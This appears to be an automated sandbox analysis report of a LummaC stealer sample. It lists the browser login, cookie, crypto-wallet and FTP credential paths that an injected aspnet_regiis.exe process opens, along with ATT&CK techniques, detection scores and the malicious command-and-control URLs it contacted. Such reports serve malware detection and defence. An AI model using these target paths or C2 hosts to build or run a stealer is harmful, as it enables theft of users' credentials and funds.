Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1796834201.0000000002B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7696, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7696, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	311 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	33 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	351 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	23 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9cOUjp7ybm.exe	66%	ReversingLabs	Win32.Exploit.LummaC
9cOUjp7ybm.exe	67%	Virustotal		Browse
9cOUjp7ybm.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\gdi32.dll	68%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://undesirabkel.click:443/apiK	100%	Avira URL Cloud	malware
https://undesirabkel.click/apirs	100%	Avira URL Cloud	malware
https://undesirabkel.click/	100%	Avira URL Cloud	malware
https://undesirabkel.click:443/api	100%	Avira URL Cloud	malware
https://undesirabkel.click:443/apiE	100%	Avira URL Cloud	malware
https://undesirabkel.click/apiL7	100%	Avira URL Cloud	malware
https://undesirabkel.click/apia7p_=	100%	Avira URL Cloud	malware
https://undesirabkel.click/d	100%	Avira URL Cloud	malware
https://undesirabkel.click/a	100%	Avira URL Cloud	malware
undesirabkel.click	100%	Avira URL Cloud	malware
https://undesirabkel.click/apiam	100%	Avira URL Cloud	malware
https://undesirabkel.click/api:5	100%	Avira URL Cloud	malware
https://undesirabkel.click/apiG5s_	100%	Avira URL Cloud	malware
https://undesirabkel.click/api	100%	Avira URL Cloud	malware
https://undesirabkel.click/#	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
undesirabkel.click	188.114.96.3	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
undesirabkel.click	true	Avira URL Cloud: malware	unknown
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://undesirabkel.click/api	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click:443/apiK	aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click:443/apiE	aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://undesirabkel.click/apiL7	aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1816229667.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 00000002.00000003.1766585638.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730631937.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766680237.0000000004F29000.00000004.00000800.00020000.00000000.sdmp	false		high
https://undesirabkel.click/	aspnet_regiis.exe, 00000002.00000003.1837433126.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
